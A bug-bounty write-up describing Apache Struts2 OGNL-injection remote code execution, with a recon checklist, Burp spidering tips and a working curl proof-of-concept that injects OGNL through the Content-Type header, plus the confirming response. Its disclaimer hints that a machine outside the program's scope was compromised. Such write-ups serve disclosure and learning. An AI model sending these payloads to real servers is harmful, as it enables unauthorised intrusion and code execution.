Write-up

RCE in private program $2500 bounty

Bug Name :- RCE
Bug Priority :- Critical
Bounty :- $2500
      

Description

org.apache.struts:struts2-core is a popular open-source framework for developing web applications in the Java programming language. Affected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affecting org.apache.struts:struts2-coreOpen this link in a new tab package, versions [2.0.0, 2.5.22)

Steps to identify

    1) Do Spider or Crawl 
    2) Check the applications is
            build with JAVA
    3) Check for the file extension 
             .Do , .action , .go & jsp
    4) insert OGNL payloads in
            Content Type
            GET or POST Parameters
            End points
    5) If u get Resposne header
            Vulnerable 
    

Steps to Automation

Set the target in burp now go to spider tab and add ognl payload start spider . if any endpoint are vulnerable then if automaticaly show response header after spider now open search tab , select in scope and show response header now search for the response header

Payloads

https://github.com/karthi-the-hacker/PayloadAllTheThings

POC

curl -i -s -k -X $'GET' \ -H $'Host: target.com' -H $'User-Agent: Chrome/89.0.4389.114 Safari/537.36' -H $'Connection: close' -H $'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*' -H $'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' -H $'Content-Type: %{#context [\'com.opensymphony.xwork2. dispatcher.HttpServletResponse\'] .addHeader(\'Hacker\', \'karthithehacker \')}.multipart/form-data' -H $'Accept-Encoding: gzip, deflate' \ $'https://target.com/'

Vulnerable Response

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Cache-Control: private
    Expires: XXXXX
    Hacker: karthithehacker
    Set-Cookie: JSESSIONID=XXXXX
    Content-Type: text/html
    Transfer-Encoding: chunked
    Date: XXXXXX
    Connection: close

Impact

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Hints

Always look for .do .action and jsp files

Desclaimer

In this POC video i have shown how i Sucessfully Exploited RCE . im not disclousing any of the private program information here .This video i have compromise machine which is not in the private program